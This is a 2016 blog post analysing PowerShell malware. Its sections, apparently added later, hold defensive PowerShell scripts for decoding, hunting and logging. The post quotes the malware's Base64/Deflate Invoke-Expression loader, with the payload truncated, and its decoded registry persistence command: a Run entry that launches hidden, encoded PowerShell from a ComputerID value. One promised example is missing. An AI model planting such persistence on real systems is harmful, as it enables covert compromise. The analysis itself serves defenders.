Saturday, November 5, 2016

Powershell Malware

I've been wanting to post about this subject for a while now but haven't had the chance. Hopefully I can give everyone some info on this subject.

First, what is PowerShell malware? Simply put, it's a PowerShell command that goes out and downloads PowerShell scripts which install keyloggers, take screenshots, copy clipboard data and download more code.

From what I can tell, this is the life cycle of PowerShell malware:

  1. A user clicks a link or otherwise gets a piece of malware onto their computer, which starts the process.
  2. It creates a value called ComputerID under HKCU\Software\Microsoft\Windows\CurrentVersion.
  3. It then creates a value in HKCU\Software\Microsoft\Windows\CurrentVersion\Run.
  4. Some of the malware also creates scheduled tasks, so that even if you delete those values the scheduled task recreates them.
  5. In domain environments it creates or modifies a GPO so that these values (and the scheduled tasks) are pushed to every computer in the domain.

Here is what it looks like (I removed the full Base64 string):

Invoke-Expression(New-Object IO.StreamReader((New-Object IO.Compression.DeflateStream([IO.MemoryStream][Convert]::FromBase64String('rV............

To figure out what they're doing, substitute "Write-Host" for the "Invoke-Expression" at the beginning and run it; the decoded script is printed instead of executed, and you get the following (again, I took out the Base64 code and replaced it with dots):
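The Write-Host trick still runs the decompression half of the one-liner. The helper below is an added example, not code from the post or from any malware sample: it reverses both encoding layers seen here (Base64 + Deflate for the outer Invoke-Expression wrapper, and the Base64 of UTF-16LE text that powershell.exe -enc expects for the inner Run value) as plain functions that never evaluate what they decode. The New-DeflatedBase64 function and the two sample strings are constructed here only so the decoder can be exercised on harmless input; the function names are my own.

```powershell
# Added example (not from the original post): decode the two encoding layers
# used in the one-liner above WITHOUT executing anything, so the payload can
# be read as text. Function names are assumptions; the decoding steps mirror
# the [Convert]::FromBase64String -> DeflateStream -> StreamReader chain shown.

function Expand-DeflatedBase64 {
    # Reverses the outer wrapper: Base64 -> raw Deflate bytes -> text.
    param([Parameter(Mandatory)][string]$Base64)
    $bytes   = [Convert]::FromBase64String($Base64)
    $mem     = New-Object IO.MemoryStream(,$bytes)
    $deflate = New-Object IO.Compression.DeflateStream($mem, [IO.Compression.CompressionMode]::Decompress)
    $reader  = New-Object IO.StreamReader($deflate)
    try { $reader.ReadToEnd() } finally { $reader.Dispose() }
}

function ConvertFrom-EncodedCommand {
    # Reverses powershell.exe -EncodedCommand / -enc, which is Base64 of UTF-16LE text.
    # This is the form the ComputerID value takes, since the Run entry feeds it to -enc.
    param([Parameter(Mandatory)][string]$Base64)
    [Text.Encoding]::Unicode.GetString([Convert]::FromBase64String($Base64))
}

function New-DeflatedBase64 {
    # Constructed test input only: compresses a harmless string the same way the
    # sample is packed, so the decoder can be tested without a real sample.
    param([Parameter(Mandatory)][string]$Text)
    $out     = New-Object IO.MemoryStream
    $deflate = New-Object IO.Compression.DeflateStream($out, [IO.Compression.CompressionMode]::Compress, $true)
    $writer  = New-Object IO.StreamWriter($deflate)
    $writer.Write($Text)
    $writer.Dispose()      # flushes and closes the DeflateStream; $out stays open (leaveOpen = $true)
    [Convert]::ToBase64String($out.ToArray())
}

# Constructed samples, labelled as such:
$outer = New-DeflatedBase64 "Write-Host 'outer layer decoded without Invoke-Expression'"
$inner = [Convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes("Write-Host 'inner -enc layer decoded'"))

Expand-DeflatedBase64 $outer        # prints the script text the wrapper would have run
ConvertFrom-EncodedCommand $inner   # prints the script text powershell -enc would have run
```

When looking at a real host, pass the data of the ComputerID value to ConvertFrom-EncodedCommand and the Base64 string from the first line to Expand-DeflatedBase64; the decoded text shows the download URL and port that the post discusses without the sample ever being executed.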

Set-ItemProperty -Force -Path HKLM:Software\Microsoft\Windows\CurrentVersion -Name ComputerID -Value  "......................."; Set-ItemProperty -Force -Path HKLM:Software\Microsoft\Windows\CurrentVersion\Run -Name PowershellActiveDirectoryValue"`"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe`" -c `"`$x=`$((gp HKLM:Software\Microsoft\Windows\CurrentVersion ComputerID).ComputerID);powershell -Win Hidden -enc `$x`""

The above is the PowerShell malware creating the registry values, with the actual commands stored as Base64: the Run entry launches a hidden powershell.exe that reads the ComputerID value back out of the registry and passes it to -enc.
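The artifacts in the lifecycle list and in the decoded command above are specific enough to hunt for on a host. The script below is an added example, not the post's own code: a read-only check for a ComputerID value under CurrentVersion, Run entries that launch powershell.exe with an encoded or hidden command, and scheduled tasks that do the same (item 4 of the lifecycle). It checks both HKLM and HKCU because the lifecycle list names HKCU while the decoded command writes to HKLM. The value name ComputerID comes from the post; the function name, the regular expressions and the output shape are my assumptions.

```powershell
# Added example (not from the original post): hunt one host for the persistence
# artifacts described above. Read-only; it changes nothing. 'ComputerID' comes
# from the post; the function name and match patterns are assumptions.

function Find-PowershellRunPersistence {
    [CmdletBinding()]
    param()
    $findings = @()
    $metaProps = 'PSPath', 'PSParentPath', 'PSChildName', 'PSDrive', 'PSProvider'

    foreach ($hive in 'HKLM:', 'HKCU:') {
        $cv  = "$hive\Software\Microsoft\Windows\CurrentVersion"
        $run = "$cv\Run"

        # 1. The marker value the malware stores its encoded payload in.
        $cid = Get-ItemProperty -Path $cv -Name ComputerID -ErrorAction SilentlyContinue
        if ($cid) {
            $findings += [pscustomobject]@{ Where = "$cv\ComputerID"; Detail = [string]$cid.ComputerID }
        }

        # 2. Run entries that start powershell with an encoded command, a hidden
        #    window, or a registry read (gp ...) like the decoded command above.
        $runProps = Get-ItemProperty -Path $run -ErrorAction SilentlyContinue
        if ($runProps) {
            foreach ($p in $runProps.PSObject.Properties) {
                if ($metaProps -contains $p.Name) { continue }
                $v = [string]$p.Value
                if ($v -match '(?i)powershell' -and
                    $v -match '(?i)-(e|ec|enc|encodedcommand)\b|-Win\w*\s+Hidden|\(gp ') {
                    $findings += [pscustomobject]@{ Where = "$run\$($p.Name)"; Detail = $v }
                }
            }
        }
    }

    # 3. Scheduled tasks whose action launches powershell with an encoded command
    #    (some variants use these to recreate the Run values after cleanup).
    foreach ($task in (Get-ScheduledTask -ErrorAction SilentlyContinue)) {
        foreach ($a in $task.Actions) {
            $cmd = "$($a.Execute) $($a.Arguments)"
            if ($cmd -match '(?i)powershell' -and $cmd -match '(?i)-(e|ec|enc|encodedcommand)\b') {
                $findings += [pscustomobject]@{ Where = "Task: $($task.TaskPath)$($task.TaskName)"; Detail = $cmd }
            }
        }
    }
    $findings
}

Find-PowershellRunPersistence | Format-List
```

An empty result is the expected case on a clean machine. Legitimate software occasionally uses -EncodedCommand in a Run value or task, so treat a hit as something to decode and read (the Detail field is the raw value) rather than as proof on its own.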

At this point, when it executes those commands, it goes out to a website to download the other scripts that create keyloggers, take screenshots, copy clipboard data, etc. It would look something like this:


The port in the example above is 9002, but it can be any port, or just plain HTTPS.

The PowerShell scripts it downloads seem to be from PowerSploit. I won't link it here, but you can Google it or find more info on GitHub.

The worst part about this whole thing is that it bypasses most of your security measures. I mean, for the most part, who is blocking PowerShell commands? As administrators we use them all the time on all of our systems. And since it's just downloading files, most web filtering will let it through.

So how do you stop it? A couple of things, but not much (as far as I know at this point in time):
  1. Use AppLocker to put PowerShell in Constrained Language Mode.
  2. Enable PowerShell logging and (if possible) collect it centrally.
  3. Whitelist known scripts and don't let anything else run PowerShell scripts. This can also be done with AppLocker.
  4. Block ports that you don't need.
If I find any more info I will post it.
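Item 2 is the control that would have shown this sample's decoded script in the event log. The script below is an added example, not the post's own code: it turns on script block, module and transcription logging by writing the same HKLM policy keys that the Group Policy settings write (so it suits a single box; in a domain, set the equivalent GPO instead), then queries the resulting 4104 events for the patterns seen in this sample. It must run as Administrator. The transcript directory and the function names are my assumptions.

```powershell
# Added example (not from the original post): enable the PowerShell logging that
# item 2 recommends via the policy registry keys, then read back script block
# events. Run as Administrator. The transcript directory is an assumed location.

$policy = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows\PowerShell'

function Enable-PowerShellLogging {
    param([string]$TranscriptDir = 'C:\PSTranscripts')   # assumption; point it at a collected share

    # Event ID 4104 logs the full text of every script block, including the
    # decompressed contents of an Invoke-Expression wrapper like the one above.
    New-Item -Path "$policy\ScriptBlockLogging" -Force | Out-Null
    Set-ItemProperty -Path "$policy\ScriptBlockLogging" -Name EnableScriptBlockLogging -Value 1 -Type DWord

    # Event ID 4103 logs pipeline execution details; '*' under ModuleNames covers all modules.
    New-Item -Path "$policy\ModuleLogging\ModuleNames" -Force | Out-Null
    Set-ItemProperty -Path "$policy\ModuleLogging" -Name EnableModuleLogging -Value 1 -Type DWord
    Set-ItemProperty -Path "$policy\ModuleLogging\ModuleNames" -Name '*' -Value '*'

    # Transcripts of every session, written to a directory you can collect centrally.
    New-Item -Path "$policy\Transcription" -Force | Out-Null
    Set-ItemProperty -Path "$policy\Transcription" -Name EnableTranscripting -Value 1 -Type DWord
    Set-ItemProperty -Path "$policy\Transcription" -Name EnableInvocationHeader -Value 1 -Type DWord
    Set-ItemProperty -Path "$policy\Transcription" -Name OutputDirectory -Value $TranscriptDir
}

function Get-SuspiciousScriptBlocks {
    # Pull recent 4104 events whose logged script text contains the building
    # blocks of this sample: Base64 decoding, Deflate, IEX, -enc, ComputerID.
    param([int]$MaxEvents = 500)
    Get-WinEvent -FilterHashtable @{ LogName = 'Microsoft-Windows-PowerShell/Operational'; Id = 4104 } `
                 -MaxEvents $MaxEvents -ErrorAction SilentlyContinue |
        Where-Object { $_.Message -match '(?i)FromBase64String|DeflateStream|Invoke-Expression|-enc\b|ComputerID' } |
        Select-Object TimeCreated,
                      @{ n = 'Snippet'; e = { $_.Message.Substring(0, [Math]::Min(200, $_.Message.Length)) } }
}

Enable-PowerShellLogging
Get-SuspiciousScriptBlocks | Format-List
```

Script block logging takes effect for new PowerShell sessions, so the query returns nothing until something has run after the keys are set. Forwarding the Microsoft-Windows-PowerShell/Operational log (or the transcript directory) to a central collector is what makes the "collect it centrally" part of item 2 real, since the malware could otherwise clear the local log along with the rest of its cleanup.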


I want to thank Tanner Kinkead for helping me decipher the code and fill in the missing pieces, as well as for the suggestions above on how to help prevent it.
